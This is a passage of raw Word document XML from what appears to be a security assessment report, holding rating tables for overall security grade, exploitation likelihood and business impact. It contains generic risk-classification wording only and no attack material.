        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1C232"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75B6D821" w14:textId="27FFEAA8" w:rsidR="00C775BE" w:rsidRDefault="00900EE3" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="028E5211" w14:textId="77777777" w:rsidR="00C775BE" w:rsidRDefault="00C775BE" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28EF1531" w14:textId="700714F8" w:rsidR="00C775BE" w:rsidRDefault="00477A52" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
              <w:t>Fair</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="770CC96C" w14:textId="6FF8CEA9" w:rsidR="00C775BE" w:rsidRDefault="009E6451" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E6451">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Current solutions protect some areas of the enterprise. Moderate changes required to meet industry best practice standards.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C775BE" w14:paraId="13587248" w14:textId="77777777" w:rsidTr="00D515A7">
        <w:trPr>
          <w:trHeight w:val="672"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="38761D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A629B89" w14:textId="53D27FEE" w:rsidR="00C775BE" w:rsidRDefault="00900EE3" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="23F5AC0A" w14:textId="77777777" w:rsidR="00C775BE" w:rsidRDefault="00C775BE" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="93C47D"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22D5CA3C" w14:textId="6888AC3C" w:rsidR="00C775BE" w:rsidRDefault="007C6114" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="38761D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="38761D"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7EBC2806" w14:textId="1ED09A75" w:rsidR="00C775BE" w:rsidRDefault="009E6451" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E6451">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Security meets accepted standards of industry best practice. Only medium- and low-risk shortcomings identified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C775BE" w14:paraId="5B4F6C2E" w14:textId="77777777" w:rsidTr="007C6114">
        <w:trPr>
          <w:trHeight w:val="657"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4324F0A0" w14:textId="0ABD4EE4" w:rsidR="00C775BE" w:rsidRPr="007C6114" w:rsidRDefault="00900EE3" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B2FF400" w14:textId="77777777" w:rsidR="00C775BE" w:rsidRDefault="00C775BE" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79B0A7F2" w14:textId="3DB3EEAD" w:rsidR="00C775BE" w:rsidRPr="007C6114" w:rsidRDefault="007C6114" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="92D050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>Excellent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0927EA2D" w14:textId="19B7FC62" w:rsidR="00C775BE" w:rsidRDefault="009E6451" w:rsidP="00D515A7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E6451">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Security exceeds industry best practice standards. Only low-risk findings identified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="551B5E65" w14:textId="77777777" w:rsidR="00C775BE" w:rsidRPr="00C775BE" w:rsidRDefault="00C775BE" w:rsidP="00C775BE"/>
    <w:p w14:paraId="6CEB0284" w14:textId="266182CA" w:rsidR="00966C99" w:rsidRPr="004668B8" w:rsidRDefault="00966C99" w:rsidP="004668B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc178499000"/>
      <w:r w:rsidRPr="004668B8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation Likelihood Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
      <w:bookmarkEnd w:id="117"/>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966C99" w14:paraId="13E2288D" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ECC6D54" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="538AEE3B" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="470A036A" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="663A57E7" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="674B18F9" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation methods are well-known and can be performed using publicly available tools. Low-skilled attackers and automated tools could successfully exploit the vulnerability with minimal difficulty.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="389080B5" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6631D61E" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20F02A39" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1F04327A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Exploitation methods are well-known, may be performed using public tools, but require configuration. Understanding of the underlying system is required for successful exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="46F7A5F0" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AA67BD8" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7FE9CA02" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1F04327A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Exploitation requires deep understanding of the underlying systems or advanced technical skills. Precise conditions may be required for successful exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25A5C1BB" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00966C99">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6305D8BB" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00966C99">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C54316" w14:textId="77777777" w:rsidR="00545C58" w:rsidRDefault="00545C58" w:rsidP="00966C99">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5342B02A" w14:textId="77777777" w:rsidR="00545C58" w:rsidRDefault="00545C58" w:rsidP="00966C99">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4533008D" w14:textId="77777777" w:rsidR="00545C58" w:rsidRDefault="00545C58" w:rsidP="00966C99">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725867CE" w14:textId="29C11C07" w:rsidR="00966C99" w:rsidRPr="00196B71" w:rsidRDefault="00966C99" w:rsidP="00196B71">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc177321913"/>
      <w:bookmarkStart w:id="119" w:name="_Toc178499001"/>
      <w:r w:rsidRPr="00196B71">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Business Impact Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>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966C99" w14:paraId="7876ADDB" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44933CED" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F9529EF" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="62FDFB94" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BF8AA4F" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Major</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DAA8D5E" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Successful exploitation may result in large disruptions of critical business functions across the organization and significant financial damage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="59B3BEA3" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44A951F4" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
